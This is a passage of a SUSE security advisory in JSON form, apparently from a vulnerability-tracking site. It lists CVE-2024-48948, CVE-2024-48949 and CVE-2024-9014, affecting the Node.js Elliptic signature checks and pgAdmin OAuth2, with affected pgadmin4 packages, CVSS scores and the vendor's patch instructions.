"text": "https://www.suse.com/security/cve/CVE-2024-48948"
}
],
"notes": [
{
"category": "general",
"text": "The Elliptic package 6.5.7 for Node.js, in its for ECDSA implementation, does not correctly verify valid signatures if the hash contains at least four leading 0 bytes and when the order of the elliptic curve\u0027s base point is smaller than the hash, because of an _truncateToN anomaly. This leads to valid signatures being rejected. Legitimate transactions or communications may be incorrectly flagged as invalid.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-48948",
"url": "https://www.suse.com/security/cve/CVE-2024-48948"
},
{
"category": "external",
"summary": "SUSE Bug 1231681 for CVE-2024-48948",
"url": "https://bugzilla.suse.com/1231681"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-10-29T12:55:34Z",
"details": "moderate"
}
],
"title": "CVE-2024-48948"
},
{
"cve": "CVE-2024-48949",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-48949"
}
],
"notes": [
{
"category": "general",
"text": "The verify function in lib/elliptic/eddsa/index.js in the Elliptic package before 6.5.6 for Node.js omits \"sig.S().gte(sig.eddsa.curve.n) || sig.S().isNeg()\" validation.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-48949",
"url": "https://www.suse.com/security/cve/CVE-2024-48949"
},
{
"category": "external",
"summary": "SUSE Bug 1231557 for CVE-2024-48949",
"url": "https://bugzilla.suse.com/1231557"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.2,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-10-29T12:55:34Z",
"details": "important"
}
],
"title": "CVE-2024-48949"
},
{
"cve": "CVE-2024-9014",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-9014"
}
],
"notes": [
{
"category": "general",
"text": "pgAdmin versions 8.11 and earlier are vulnerable to a security flaw in OAuth2 authentication. This vulnerability allows an attacker to potentially obtain the client ID and secret, leading to unauthorized access to user data.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-9014",
"url": "https://www.suse.com/security/cve/CVE-2024-9014"
},
{
"category": "external",
"summary": "SUSE Bug 1230928 for CVE-2024-9014",
"url": "https://bugzilla.suse.com/1230928"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-10-29T12:55:34Z",
"details": "important"
}
],
"title": "CVE-2024-9014"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…